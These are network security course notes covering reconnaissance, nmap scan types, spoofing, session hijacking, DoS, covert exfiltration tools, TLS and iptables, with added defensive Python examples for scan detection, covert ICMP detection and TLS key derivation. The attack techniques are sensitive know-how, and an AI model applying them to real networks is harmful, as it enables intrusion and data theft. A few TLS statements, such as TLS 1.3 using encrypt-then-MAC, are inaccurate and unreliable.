Notes from the Network Security course at NYU by Phillip Mak

The Basics

  • Risk Management: avoid, mitigate, transfer (insurance, another department, outsourcing), accept
  • Quantitative Risk Assessment:
    • Exposure Factor (EF) = percentage of the asset lost to the identified threat
    • Single Loss Expectancy (SLE) = Asset Value * Exposure Factor
    • Annualized Rate of Occurrence (ARO) = estimated frequency with which the threat occurs in a year
    • Annualized Loss Expectancy (ALE) = ARO * SLE
  • Qualitative Risk Assessment: Likelihood * Consequence
  • Delphi method - NIST-recommended way to score likelihood and consequence: 3 independent experts score separately; if the results are too varied, do another round with more information.

Recon

  • Combination of social engineering steps to achieve a goal
    • Example: the 2012 Twitter compromise of Wired writer Mat Honan (@mat), chained through Gmail, his domain name, me.com, Amazon and Apple
  • Google dorks: https://www.exploit-db.com/google-hacking-database
  • edgar.gov to find a company’s public information (SEC filings)
  • Spoof caller ID for social engineering
  • Maltego - OSINT engine for domain names, DNS info, netblocks, IP addresses, email addresses, websites, phone numbers, companies, social media
  • https://geospy.web.app/
  • WHOIS lookup
  • DNS lookups
  • osintframework.com
  • Registered IP blocks and more information from arin.net (for North America) and the other regional registries
    • can then scan the block with nmap to see which addresses are (not) in use
  • do DNS lookups - figure out A and MX records
  • robtex.com - to see a graph of a domain’s records
  • censys.io
  • Figured out using traceroute that a Palo Alto firewall is in use and nysernet.org is the ISP
  • shodan.io
  • Network Recon: Host Discovery
    • Ping sweep (ping all IPs in a range)
    • Zone transfer using dig
    • Brute-force forward DNS (dnsmap; subdomain enumeration)
    • Prevention: split DNS, implemented by modern DNS servers, separates queries from the internal and external networks. Helps avoid leaking internal IPs and thus prevents DNS rebinding attacks.
  • Network Recon: Service Discovery
    • hping is a good, fast utility for sending custom packets; scapy is slow; nmap for automated port scanning
    • Port scanning by sending TCP and UDP packets to various ports:
      • SYN-ACK = open
      • RST = closed
      • DROP (no response) = firewalled or network issue
      • REJECT = ICMP unreachable in response to a TCP request (usually a firewall letting you know you can’t access the port; could also be a network issue)
      • UDP: a closed port gets an ICMP unreachable packet
      • UDP port scanning is more complicated because you need to send the right packet to the right service: sending a DHCP packet to a DNS port gets no response. No response also results when the packet was blocked (firewall), a network issue occurred, or the ICMP unreachable rate limit has been reached (Linux limits sending to 1 ICMP unreachable per second → this makes UDP port scanning very slow)
      • UDP scanning: simple request/response (DNS, NTP) on success; ICMP destination unreachable on a closed port (ICMP unreachable sending is rate-limited to prevent DDoS, which limits the number of closed ports you can see)
    • Nmap:
      • TCP connect scan: uses the connect() syscall (no root required)
      • TCP SYN scan: half-open scan. Only cares about SYN and SYN-ACK and never completes the handshake, thus significantly faster (root permissions required)
      • TCP FIN scan: FIN to target; closed ports reply with RST
      • TCP NULL scan: no flags set. On some hosts, closed ports return RST
      • TCP ACK scan: RST → port is open or closed, but likely a stateless firewall or no firewall. Good to run a normal SYN scan alongside it and compare. Only stateless firewalls leak this information.
      • TCP XMAS scan: FIN, URG, PSH flags set. Closed ports return RST.
      • FTP proxy “bounce attack” - bounce a scan off a poorly configured FTP server
      • Version scanning
      • Fragmented scan
      • TCP sequence prediction
      • TCP idle scan: hides the scan source, so an IDS does not see the nmap scan coming from the attacker - uses a zombie machine to send packets to the target and infers open/closed ports from the zombie’s IP identifier (IP ID)
    • Firewalk: legitimate UDP services (like DNS, with a custom TTL) can be used to map filtering when regular traceroute is blocked by the firewall. Figures out which layer 3/4 ACLs are present on filtering routers and firewalls. Uses TCP and UDP.
  • Web Recon
    • httprecon: Web server fingerprinting
    • vega: Web app vulnerability tester
  • Geolocation
    • Wi-Fi positioning system (WPS)
      • https://www.wigle.net/
      • Data collectors such as Google, Apple, Microsoft, and WPS providers keep large databases of information that pair Wi-Fi networks with geographical locations.
    • Server Based Geolocation
      • Server-based geolocation determines your device’s location based on its IP address through a wireless or wired connection.
      • whatismyipaddress.com
    • Device Based Geolocation - GPS
  • FaceID
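As an added example (not part of the original notes), the following Python script takes the defender’s side of the port-scan discussion above: it parses iptables LOG lines, names the nmap probe type from the TCP flags, and flags sources that hit many distinct ports within a short window. The log lines, addresses and thresholds are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed iptables LOG lines (kernel key=value format); sample data, not a real capture.
SAMPLE_LOG = """\
Mar  1 10:00:01 fw kernel: IPT: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 LEN=44 TTL=52 ID=1 PROTO=TCP SPT=40001 DPT=22 WINDOW=1024 RES=0x00 SYN URGP=0
Mar  1 10:00:01 fw kernel: IPT: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 LEN=44 TTL=52 ID=2 PROTO=TCP SPT=40001 DPT=25 WINDOW=1024 RES=0x00 SYN URGP=0
Mar  1 10:00:02 fw kernel: IPT: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 LEN=44 TTL=52 ID=3 PROTO=TCP SPT=40001 DPT=80 WINDOW=1024 RES=0x00 SYN URGP=0
Mar  1 10:00:02 fw kernel: IPT: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 LEN=44 TTL=52 ID=4 PROTO=TCP SPT=40001 DPT=443 WINDOW=1024 RES=0x00 SYN URGP=0
Mar  1 10:00:03 fw kernel: IPT: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 LEN=44 TTL=52 ID=5 PROTO=TCP SPT=40001 DPT=3306 WINDOW=1024 RES=0x00 SYN URGP=0
Mar  1 10:00:04 fw kernel: IPT: IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.10 LEN=44 TTL=52 ID=6 PROTO=TCP SPT=40001 DPT=8080 WINDOW=1024 RES=0x00 SYN URGP=0
Mar  1 10:00:01 fw kernel: IPT: IN=eth0 OUT= SRC=198.51.100.5 DST=192.0.2.10 LEN=60 TTL=63 ID=7 PROTO=TCP SPT=51000 DPT=443 WINDOW=64240 RES=0x00 SYN URGP=0
Mar  1 10:00:02 fw kernel: IPT: IN=eth0 OUT= SRC=198.51.100.5 DST=192.0.2.10 LEN=60 TTL=63 ID=8 PROTO=TCP SPT=51000 DPT=443 WINDOW=64240 RES=0x00 SYN URGP=0
Mar  1 10:05:00 fw kernel: IPT: IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.10 LEN=40 TTL=48 ID=9 PROTO=TCP SPT=42000 DPT=21 WINDOW=1024 RES=0x00 URG PSH FIN URGP=0
Mar  1 10:05:00 fw kernel: IPT: IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.10 LEN=40 TTL=48 ID=10 PROTO=TCP SPT=42000 DPT=22 WINDOW=1024 RES=0x00 URG PSH FIN URGP=0
Mar  1 10:05:01 fw kernel: IPT: IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.10 LEN=40 TTL=48 ID=11 PROTO=TCP SPT=42000 DPT=23 WINDOW=1024 RES=0x00 URG PSH FIN URGP=0
Mar  1 10:05:01 fw kernel: IPT: IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.10 LEN=40 TTL=48 ID=12 PROTO=TCP SPT=42000 DPT=25 WINDOW=1024 RES=0x00 URG PSH FIN URGP=0
Mar  1 10:05:02 fw kernel: IPT: IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.10 LEN=40 TTL=48 ID=13 PROTO=TCP SPT=42000 DPT=110 WINDOW=1024 RES=0x00 URG PSH FIN URGP=0
"""

TCP_FLAGS = {"SYN", "ACK", "FIN", "RST", "PSH", "URG"}
LINE_RE = re.compile(r"^(\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ kernel: (.*)$")


def parse_log_line(line):
    """Parse one iptables LOG line for TCP into a dict (None for anything else)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    fields, flags = {}, set()
    for tok in m.group(2).split():
        if "=" in tok:
            k, v = tok.split("=", 1)
            fields[k] = v
        elif tok in TCP_FLAGS:
            flags.add(tok)  # the kernel prints set TCP flags as bare words after RES=
    if fields.get("PROTO") != "TCP":
        return None
    return {"ts": datetime.strptime(m.group(1), "%b %d %H:%M:%S"),
            "src": fields["SRC"], "dst": fields["DST"],
            "dpt": int(fields["DPT"]), "flags": frozenset(flags)}


def probe_type(flags):
    """Name the nmap scan type that a single probe's TCP flag combination corresponds to."""
    if flags == {"SYN"}:
        return "SYN"
    if not flags:
        return "NULL"
    if flags == {"FIN"}:
        return "FIN"
    if flags == {"FIN", "PSH", "URG"}:
        return "XMAS"
    if flags == {"ACK"}:
        return "ACK"
    return "other"


def detect_scans(lines, window_s=10, min_ports=5):
    """Return {src: report} for sources that probed at least min_ports distinct
    destination ports within any window_s-second window (sliding window per source)."""
    by_src = defaultdict(list)
    for line in lines:
        ev = parse_log_line(line)
        if ev:
            by_src[ev["src"]].append(ev)
    reports = {}
    for src, events in by_src.items():
        events.sort(key=lambda e: e["ts"])
        best, start = 0, 0
        for end in range(len(events)):
            while (events[end]["ts"] - events[start]["ts"]).total_seconds() > window_s:
                start += 1
            best = max(best, len({e["dpt"] for e in events[start:end + 1]}))
        if best >= min_ports:
            types = defaultdict(int)
            for e in events:
                types[probe_type(e["flags"])] += 1
            reports[src] = {"distinct_ports": best, "probe_types": dict(types),
                            "targets": sorted({e["dst"] for e in events})}
    return reports


if __name__ == "__main__":
    for src, rep in detect_scans(SAMPLE_LOG.splitlines()).items():
        print(src, rep)
```

The host retrying port 443 twice is not reported; the two sources sweeping six and five ports are, with the probe type telling you which nmap scan mode was used.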

Exploitation

  • IP Address Spoofing: Prevent tracing the actions back to attacker
  • FTP Proxy bounce attack
  • Ingress Filtering: ensure that incoming packets are actually from where they claim to be; to prevent IP spoofing, drop packets that appear spoofed. Tier 1 ISPs (AT&T, Verizon) usually do it by dropping packets that are not destined to addresses they own or, conversely, whose source address is not one they know the sending network owns. Regional ISPs often don’t do it these days, so other networks in the region can be spoofed.
  • Egress Filtering: almost never done; prevents spoofed packets from leaving a network
  • Session Hijacking: take control of one side of a TCP connection by sniffing and spoofing. Knock Alice off the network to keep control after the hijack (DDoS, a vulnerability, ARP cache poisoning, or a deauthentication attack to kick her off Wi-Fi); otherwise Bob’s ACKs to Alice cause TCP retransmissions and the connection hangs.
  • DoS attacks:
    • Connection flooding: flood with SYN packets to exhaust the half-open connection limit. Prevented by SYN cookies and a connection cache
    • Bandwidth flooding; vulnerability attacks; fragmentation-related issues are common since fragmentation is complicated - Land, Ping of Death, Jolt2
    • Teardrop, NewTear, Bonk, Syndrop: IP fragmentation attacks that make the target consume all its resources on the impossible task of reassembling the overlapping fragments sent by the attacker.
    • DNS/NTP reflection attack: spoof the victim’s IP and send DNS requests; the DNS servers respond to the victim. A 100-byte request can lead to a 512-byte response to the victim, amplified further by using many servers. The same can be done with NTP monlist packets. Prevention: filtering dangerous packets, over-provisioning resources, signature and anomaly detection, rate limiting.
  • DNS Redirection Attack (Hijacking): reply to the victim’s DNS requests with your own fake IP - requires IP address spoofing, matching the reply ID to the request ID (easy if we capture traffic), and sending the reply faster than the legitimate server. The browser may show a certificate mismatch or “insecure site”.
  • Web client-side attacks: fake URLs (phishing using Cyrillic characters, hidden links, etc.)
  • Vulnerability Scanners:
    • Nessus, OpenVAS
    • Nikto - Web Vulnerability Scanner
  • Exploitation Tools:
    • Immunity Canvas
    • Core Impact
    • Metasploit (learning resource: metasploit unleashed)
  • Rootkits: HackerDefender (Kernel mode rootkit)
  • Client-side exploits - much more common than network-side exploits these days - browser attacks, Java attacks, etc.

Post-Exploitation

  • Persistence: to attack other systems, manipulate and destroy data
    • Startup services
    • Trojans using wrappers to evade AVs (hidden programs that run in the background of other programs)
    • Rootkits (can go as deep as the MBR, firmware, hypervisor)
    • Hiding files with Alternate Data Streams (ADS). Prevented using file integrity checking and host-based IDS
  • Removing forensic evidence: edit/delete log files
    • Defended against by forwarding logs to a central server, encrypting logs, making them append-only, restrictive permissions, and using SIEMs
  • Exfiltration: often uses steganography (a covert channel that transmits information hidden within a legitimate channel)
    • Create a tunnel under HTTP (80), SSH, GRE
    • covert_tcp: hides data within TCP/IP header fields (IP ID, sequence number, ACK number using a bounce). Data can also be hidden in ICMP echo request payloads or the identifier/sequence number, and the frequency or timing of pings can itself be an indicator. Detection involves checking that sequence numbers increment normally and analysing ping payload data.
    • loki2: hides information in ICMP echo request and reply packets
    • Reverse WWW shell: C&C over HTTP - looks like normal traffic
    • Advanced exfil using DNS, HTTP, email, Pastebin, Dropbox
  • DLP - Data Loss Prevention (to prevent data from accidentally or intentionally leaving the network) - email filters, USB checks, etc. - prevents exfiltration using regexes and keywords, host- and network-based
  • Useful utilities: netcat
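An added example (not from the notes) of the detection checks mentioned for covert ICMP channels: sequence numbers that do not increment, payloads that do not match a stock ping, and irregular timing. The ping payload patterns and the sample streams are assumptions of this example, not captured traffic.

```python
from statistics import mean, pstdev


def iputils_payload(length=56):
    """Build the payload this example assumes for a stock Linux ping: a 16-byte
    timestamp (zeroed here) followed by bytes whose value equals their offset."""
    return b"\x00" * 16 + bytes(i & 0xFF for i in range(16, length))


def standard_ping_payload(payload):
    """True if the payload matches a stock ping pattern (an assumption of this example):
    iputils (8- or 16-byte timestamp, then byte i == i) or Windows ping (a..w repeated)."""
    for prefix in (8, 16):
        if len(payload) > prefix and all(payload[i] == (i & 0xFF) for i in range(prefix, len(payload))):
            return True
    return payload == (b"abcdefghijklmnopqrstuvw" * 2)[:32]


def analyse_echo_stream(packets, max_jitter=0.5):
    """Apply the three checks from the notes to a list of {ts, id, seq, payload} ICMP echo
    requests from one source: sequence numbers should increment by 1, payloads should look
    like a stock ping, and inter-packet timing should be regular."""
    reasons = []
    seqs = [p["seq"] for p in packets]
    gaps = [(a, b) for a, b in zip(seqs, seqs[1:]) if b != a + 1]
    if gaps:
        reasons.append(f"sequence numbers not incrementing by 1: {gaps}")
    odd = sum(1 for p in packets if not standard_ping_payload(p["payload"]))
    if odd:
        reasons.append(f"{odd} packet(s) carry a non-standard payload")
    ts = [p["ts"] for p in packets]
    intervals = [b - a for a, b in zip(ts, ts[1:])]
    # coefficient of variation of the inter-arrival times; stock ping is ~constant
    if len(intervals) >= 2 and mean(intervals) > 0 and pstdev(intervals) / mean(intervals) > max_jitter:
        reasons.append("irregular ping timing")
    return {"suspicious": bool(reasons), "reasons": reasons}


# Constructed sample streams (not captures): a normal 1-second ping, and a covert channel
# that smuggles text through the payload and the sequence-number field with uneven timing.
NORMAL_PINGS = [{"ts": float(i), "id": 0x1234, "seq": i + 1, "payload": iputils_payload()}
                for i in range(5)]
COVERT_PINGS = [{"ts": t, "id": 0x1234, "seq": s, "payload": b"\x00" * 16 + chunk.ljust(40, b"\x00")}
                for t, s, chunk in zip([0.0, 0.2, 1.9, 2.0, 3.7], b"secret"[:5],
                                       [b"user=alice", b"pw=hunter2", b"host=db1", b"ok", b"done"])]

if __name__ == "__main__":
    print("normal:", analyse_echo_stream(NORMAL_PINGS))
    print("covert:", analyse_echo_stream(COVERT_PINGS))
```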

PKI/TLS

  • ARP cache poisoning AITM works in real life: you can change DNS to point to an unencrypted website and then see everything
  • Diffie-Hellman can be AITMed by having the attacker generate two different sets of keys and giving Alice and Bob different keys
    • This flaw of DH, that the keys of A and B end up different from each other and enable an AITM, brings the need for an extra protocol - commonly RSA
    • The values being exchanged just need to be signed, not necessarily encrypted - done using RSA [since integrity is the issue, not confidentiality]
    • Then the shared key K is used for AES encryption.
  • This is the typical flow used in web security. AES is used for encryption because it is significantly faster than RSA.
  • HMAC is a keyed hash (symmetric key); a digital signature is private key + hash [the hash is encrypted using the private key]
  • Digital signatures - encrypted hash of the message (sign the hash with the private key so that anyone who has the public key knows it came from you)
  • Fingerprints - hash of the certificate
  • Basic constraints: whether it’s a CA or not
  • The whole certificate is digitally signed with the issuer’s private key
  • Website certificate Subject Common Name doesn’t matter anymore (deprecated); Subject Alternative Name is what’s used these days
  • For CAs, the Subject Common Name does matter.
  • Certificate issuance for websites usually works by putting something in DNS - implicit assumption on the web that if you control the DNS, you control the domain
  • Within an email, a certificate carrying Alice’s public key is usually sent along with the message and digital signature so that Bob can verify it
  • HMAC is normally used for verifying that Alice and Bob have the correct key
  • Replay (playback) attack - Trudy replays a message again and again; both digital signatures and HMACs are susceptible to it
    • Nonces can prevent replay attacks. With the nonce, B also knows the other host A is alive
  • Encrypted email uses double RSA encryption to encrypt and share a symmetric (AES) key, then uses the AES key to actually encrypt the message
  • Types of TLS certs - DV, OV, EV (Domain Validation, Organization Validation, Extended Validation), based on what is validated
  • Until a few years ago, EV certs showed a green padlock. That has been phased out, so we can’t tell what type of cert a website uses.
  • TLS has 4 protocols -
  • The TLS handshake happens after the TCP handshake completes and the connection is established.
  • SSL = TLS (the name was changed about 10 years ago)
  • TLS Handshake
    1. ClientHello: Client→Server - version, cipher suites, client random, session ID (for resumption), options
    2. ServerHello: Server→Client - selects a cipher suite
    3. Certificate: Server→Client - sends the public key (then the client makes sure the cert is valid)
    4. ServerKeyExchange: Server→Client - for ephemeral key exchange (DHE: A, g, n - digitally signed with the server’s private key)
    5. ServerHelloDone: Server→Client
    6. ClientKeyExchange: Client→Server - sends key exchange data (DHE: B - digitally signed with the public key of the server obtained from the certificate)
    7. ChangeCipherSpec: Client→Server - “I’m ready to start encryption”
    8. Finished: Client→Server - hash of all the previous handshake messages (1-6); the first encrypted message from the client
    9. ChangeCipherSpec: Server→Client - server will now activate encryption
    10. Finished: Server→Client - hash of all the prior handshake messages (1 to 6 and 8; ChangeCipherSpec messages are not handshake messages)
  • TLS Abbreviated Handshake: session resumption, because creating a new session is expensive. Skips certificate validation, which is an expensive process.
    1. ClientHello: sends the session ID
    2. ServerHello: checks whether it remembers the session ID (usually remembered for 15 seconds after the previous connection)
    3. ChangeCipherSpec: Server→Client
    4. Finished: Server→Client
    5. ChangeCipherSpec: Client→Server
    6. Finished: Client→Server
  • The client sends Finished first in the full handshake; the server sends it first in the abbreviated one
  • SSL cipher suites
    • TLS_DHE_RSA_WITH_AES_128_CBC_SHA256: use DHE, protected by RSA signatures (against MITM), to generate a bulk-encryption AES-128-CBC key. SHA256 here is the keyed hash (HMAC) used for protecting the integrity of the messages (confidentiality is already protected by the bulk encryption, but an attacker can modify the ciphertext to break integrity, which is why the HMAC is needed). After Diffie-Hellman, the value generated is actually the PMS (pre-master secret); that key is used to generate two keys - the AES-128 key and the HMAC-SHA256 key.
    • TLS_RSA_WITH_AES_128_GCM_SHA256: since there’s no Diffie-Hellman, the ServerKeyExchange step is empty. In ClientKeyExchange, the client just picks a key K, encrypts it with the server’s public key and sends it to the server.
  • Diffie-Hellman without ephemeral keys is not used these days. In that scheme (A, g, n) were stored in the public cert itself and (a) in the private key. Fixed Diffie-Hellman is bad because it violates perfect forward secrecy: if tomorrow the private key leaks, the attacker can generate the bulk-encryption key, since they have a, and decrypt old ciphertext. With ephemeral DH the keys are not reused, so leakage of a new key won’t expose old encrypted communication. In TLS_RSA_WITH_AES_128_CBC_SHA256 this is also a problem, since the bulk-encryption key is encrypted with the RSA public key (decryptable with the private key) and sent from client to server.
  • Encrypt-then-MAC is best compared to MAC-then-encrypt or encrypt-and-MAC, because the decryption engine won’t be used if the MAC doesn’t match. TLS 1.3 uses encrypt-then-MAC. TLS 1.2 and below use MAC-then-encrypt.
  • SSL Alert Protocol: used when there is a problem with the connection (like a TCP reset)
  • TLS 1.3 only allows cipher suites that have perfect forward secrecy
  • The TLS 1.3 handshake is much quicker because key shares are sent in the ClientHello itself. Also more secure. But a lot of websites still use 1.2 today. Key exchange is combined with the Hellos; for the server, the Certificate is combined with its Hello too.
    • In the TLS 1.3 ClientHello the version field still says 1.2, and the supported_versions extension is used to say that TLS 1.3 is supported. This is to handle legacy systems and not break 1.2.
  • Attacks:
    • MITM: version rollback attack: force the client to offer an earlier version of SSL that has vulnerabilities
    • MITM: cipher-spec rollback: force the client to offer weaker ciphers so the traffic can be broken more easily
    • Install a malicious CA on the device
    • TCP reset attack - break the SSL connection
    • DoS by predicting the sequence number: SSL will ignore the injected data, but TCP will accept it
  • SSLStrip - HTTP downgrade attack - the attacker needs to be in a MITM position, e.g. via ARP spoofing
    • the attacker may end up with an HTTPS session to the server if the server forces it, but tries to keep HTTP-only communication with the client
    • the attacker forces Alice into an HTTP session, so no server cert verification takes place
  • TLS/TCP: TLS expects a close_notify TLS message before the TCP connection ends. If a TCP RST comes before close_notify, something is wrong, such as an attacker.
  • Mutual authentication using PKI: Alice→Server: nonce R; Server→Alice: Encrypted(R); then the reverse with another nonce
  • CBC mode ensures that the same plaintext generates different ciphertext because of the random IV
  • Certificate Transparency log: prevents spoofing of certificates by having a public log of all certificates (submitted by CAs, verified by browsers)
  • Does an expired cert still do encryption? Yes.
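An added example, not from the notes, of how the PMS turns into the AES and HMAC keys of the TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 suite above and how the Finished hash covers the transcript, using the TLS 1.2 PRF from RFC 5246 with only the standard library. The randoms, pre-master secret and handshake byte strings are constructed stand-ins for the real messages.

```python
import hashlib
import hmac


def p_sha256(secret, seed, length):
    """P_SHA256 from RFC 5246 section 5: A(0) = seed, A(i) = HMAC(secret, A(i-1)),
    output = HMAC(secret, A(1) + seed) || HMAC(secret, A(2) + seed) || ..."""
    out, a = b"", seed
    while len(out) < length:
        a = hmac.new(secret, a, hashlib.sha256).digest()
        out += hmac.new(secret, a + seed, hashlib.sha256).digest()
    return out[:length]


def prf(secret, label, seed, length):
    """TLS 1.2 PRF(secret, label, seed) = P_SHA256(secret, label || seed)."""
    return p_sha256(secret, label + seed, length)


def master_secret(pre_master_secret, client_random, server_random):
    """48-byte master secret derived from the PMS (the DHE result, or the RSA-encrypted K)."""
    return prf(pre_master_secret, b"master secret", client_random + server_random, 48)


def key_block(master, client_random, server_random, mac_len=32, key_len=16):
    """RFC 5246 6.3 key expansion for AES_128_CBC_SHA256: two HMAC-SHA256 keys (32 bytes)
    and two AES-128 keys (16 bytes), one pair per direction. Note the seed order is
    server_random || client_random here; TLS 1.2 CBC suites take no IV from the block."""
    layout = [("client_write_MAC_key", mac_len), ("server_write_MAC_key", mac_len),
              ("client_write_key", key_len), ("server_write_key", key_len)]
    kb = prf(master, b"key expansion", server_random + client_random, sum(n for _, n in layout))
    keys, off = {}, 0
    for name, n in layout:
        keys[name] = kb[off:off + n]
        off += n
    return keys


def verify_data(master, label, handshake_messages):
    """Finished.verify_data = PRF(master_secret, label, SHA256(handshake messages))[:12].
    ChangeCipherSpec is not a handshake message, so it never enters the transcript."""
    transcript = hashlib.sha256(b"".join(handshake_messages)).digest()
    return prf(master, label, transcript, 12)


# Constructed stand-ins for the handshake bytes (not a capture).
CLIENT_RANDOM = bytes.fromhex("11" * 32)
SERVER_RANDOM = bytes.fromhex("22" * 32)
PRE_MASTER_SECRET = bytes(range(1, 49))  # would come from the DHE computation
HANDSHAKE = [b"ClientHello:TLS1.2 suites=DHE_RSA_AES128_CBC_SHA256,RSA_AES128_GCM_SHA256",
             b"ServerHello:DHE_RSA_AES128_CBC_SHA256", b"Certificate:...",
             b"ServerKeyExchange:A,g,n+signature", b"ServerHelloDone", b"ClientKeyExchange:B"]


def finished_exchange(handshake=HANDSHAKE):
    """Derive the keys and both Finished values, and check that a ClientHello altered in
    transit (a cipher-spec rollback by a MITM) yields a different verify_data: the peer
    hashing the real transcript will not match it. In the real protocol the server's
    Finished covers the client's whole Finished message; its verify_data stands in here."""
    ms = master_secret(PRE_MASTER_SECRET, CLIENT_RANDOM, SERVER_RANDOM)
    client_fin = verify_data(ms, b"client finished", handshake)                  # messages 1-6
    server_fin = verify_data(ms, b"server finished", handshake + [client_fin])   # 1-6 and 8
    weakened = [b"ClientHello:TLS1.2 suites=RSA_AES128_GCM_SHA256"] + handshake[1:]
    rollback_detected = verify_data(ms, b"client finished", weakened) != client_fin
    return {"master_secret": ms, "keys": key_block(ms, CLIENT_RANDOM, SERVER_RANDOM),
            "client_finished": client_fin, "server_finished": server_fin,
            "rollback_detected": rollback_detected}


if __name__ == "__main__":
    for k, v in finished_exchange().items():
        print(k, v.hex() if isinstance(v, bytes) else v)
```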

Firewalls

  • Used for microsegmentation as well - separate networks for different projects in an org
  • Inspect traffic that goes through them and only allow some of it to pass
  • Packet filter firewall (traditional):
    • fast, stateless firewall (look at the packet and make the allow/deny decision)
    • very efficient if simple rules are used
    • can’t do complex logic (like user logins on SSH)
  • Stateful firewall: keeps track of connection states and times out entries after an interval
  • Proxies (application gateways):
    • A server used as an intermediary (FTP proxies, mail servers) between user and service to inspect and improve traffic.
    • Can do malware scanning, heuristic analysis, DLP (Data Loss Prevention), etc. on the incoming data
    • For decrypting SSL connections, the proxy relies on being a CA trusted by your browser: it decrypts the traffic and re-signs it so that it seems to come from amazon.
  • Bastion host: host designed to withstand attacks
  • DMZ (demilitarized zone or perimeter network): separate from both the internal network and the internet; put forward-facing web servers here
  • ACLs: access control lists (packet-filter firewall rules applied to usually non-firewall devices)
  • iptables: user-space interface to the Linux netfilter firewall (FILTER, NAT, MANGLE, RAW tables)
    • FILTER table: 3 chains - INPUT, OUTPUT, FORWARD
    • Host-based firewall: traffic is only in (INPUT chain) or out (OUTPUT chain) (only one interface matters)
    • Network-based firewall: apart from in and out, traffic is also forwarded between interfaces (FORWARD chain)
    • INPUT chain: packets destined for the firewall
    • OUTPUT chain: packets originating from the firewall
    • FORWARD chain: the firewall is neither the source IP nor the destination IP
    • Once an iptables rule matches, processing stops; thus the order of the rules is important.
    • Only for special non-terminating targets (like LOG) does processing continue
    • The iptables default policy should always be set for each chain (-P); best practice is to DROP by default. Its position doesn’t matter, but conventionally it is written at the top.
    • REJECT vs DROP: REJECT sends an ICMP unreachable packet back; DROP just drops the packet.
    • -m conntrack: connection tracking for a stateful firewall
    • iptables -A INPUT -p tcp -s 10.10.10.0/24 --dport 443 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
      • allow packets of new and established connections from that source network to port 443 (target names are upper case, the state list has no spaces, and --dport needs -p tcp)
    • iptables -p icmp -h lists all ICMP-related iptables options
    • iptables -P INPUT DROP: set the default policy on the INPUT chain to DROP
    • iptables can be used to rate-limit network traffic - e.g. limit the number of ping packets getting into the internal network (iptables -m limit -h)
    • can be used to log packets: iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j LOG --log-prefix "IP_SPOOF A: "
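An added example, not part of the notes, that models the iptables semantics above in Python (first terminating match wins, LOG records and keeps going, the chain policy applies last) and shows why rule order matters by misplacing the anti-spoofing rule from the notes. The packets, addresses and interface names are constructed.

```python
import ipaddress
from dataclasses import dataclass
from typing import Optional


@dataclass
class Rule:
    """One iptables rule: match fields (None = wildcard) and a target.
    LOG is non-terminating; ACCEPT, DROP and REJECT end chain processing."""
    target: str
    proto: Optional[str] = None            # -p
    src: Optional[str] = None              # -s CIDR
    in_if: Optional[str] = None            # -i
    dport: Optional[int] = None            # --dport
    ctstate: Optional[frozenset] = None    # -m conntrack --ctstate
    log_prefix: str = ""                   # --log-prefix

    def matches(self, pkt):
        return ((self.proto is None or pkt["proto"] == self.proto)
                and (self.src is None or ipaddress.ip_address(pkt["src"]) in ipaddress.ip_network(self.src))
                and (self.in_if is None or pkt["in"] == self.in_if)
                and (self.dport is None or pkt.get("dport") == self.dport)
                and (self.ctstate is None or pkt["ctstate"] in self.ctstate))


class Chain:
    def __init__(self, policy="DROP"):          # iptables -P <chain> DROP
        self.policy, self.rules, self.log = policy, [], []

    def append(self, rule):                     # iptables -A <chain> ...
        self.rules.append(rule)

    def evaluate(self, pkt):
        """First terminating match wins; LOG records the packet and continues;
        the chain policy decides when nothing matched."""
        for rule in self.rules:
            if not rule.matches(pkt):
                continue
            if rule.target == "LOG":
                self.log.append(f"{rule.log_prefix}IN={pkt['in']} SRC={pkt['src']} PROTO={pkt['proto'].upper()}")
                continue
            return rule.target
        return self.policy


def build_input_chain(spoof_rule_first=True):
    """INPUT chain from the notes: log and drop RFC 1918 sources arriving on the external
    interface eth1, allow new/established HTTPS from 10.10.10.0/24, allow return traffic.
    With spoof_rule_first=False the broad ACCEPT rules are evaluated before the spoof check."""
    chain = Chain(policy="DROP")
    rules = [
        Rule("LOG", in_if="eth1", src="10.0.0.0/8", log_prefix="IP_SPOOF A: "),
        Rule("DROP", in_if="eth1", src="10.0.0.0/8"),
        Rule("ACCEPT", proto="tcp", src="10.10.10.0/24", dport=443, ctstate=frozenset({"NEW", "ESTABLISHED"})),
        Rule("ACCEPT", ctstate=frozenset({"ESTABLISHED", "RELATED"})),
    ]
    if not spoof_rule_first:
        rules = rules[2:] + rules[:2]
    for r in rules:
        chain.append(r)
    return chain


# Constructed packets (dicts standing in for what netfilter hands to the chain).
HTTPS_FROM_LAN = {"in": "eth0", "src": "10.10.10.5", "proto": "tcp", "dport": 443, "ctstate": "NEW"}
SSH_FROM_LAN = {"in": "eth0", "src": "10.10.10.5", "proto": "tcp", "dport": 22, "ctstate": "NEW"}
SPOOFED_EXTERNAL = {"in": "eth1", "src": "10.10.10.5", "proto": "tcp", "dport": 443, "ctstate": "NEW"}
RETURN_TRAFFIC = {"in": "eth1", "src": "198.51.100.20", "proto": "tcp", "dport": 51000, "ctstate": "ESTABLISHED"}

if __name__ == "__main__":
    good, bad = build_input_chain(), build_input_chain(spoof_rule_first=False)
    for name, pkt in [("https", HTTPS_FROM_LAN), ("ssh", SSH_FROM_LAN),
                      ("spoofed", SPOOFED_EXTERNAL), ("return", RETURN_TRAFFIC)]:
        print(f"{name:8} ordered={good.evaluate(pkt):7} misordered={bad.evaluate(pkt)}")
    print(good.log)
```

The spoofed packet (an internal source address arriving on the external interface) is logged and dropped by the correctly ordered chain, but accepted once the broad ACCEPT precedes the spoof rule.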

Layer 2 Security

  • Layer 2 Protocols have no protection at all since there’s no encryption, no authentication, etc

MAC attacks

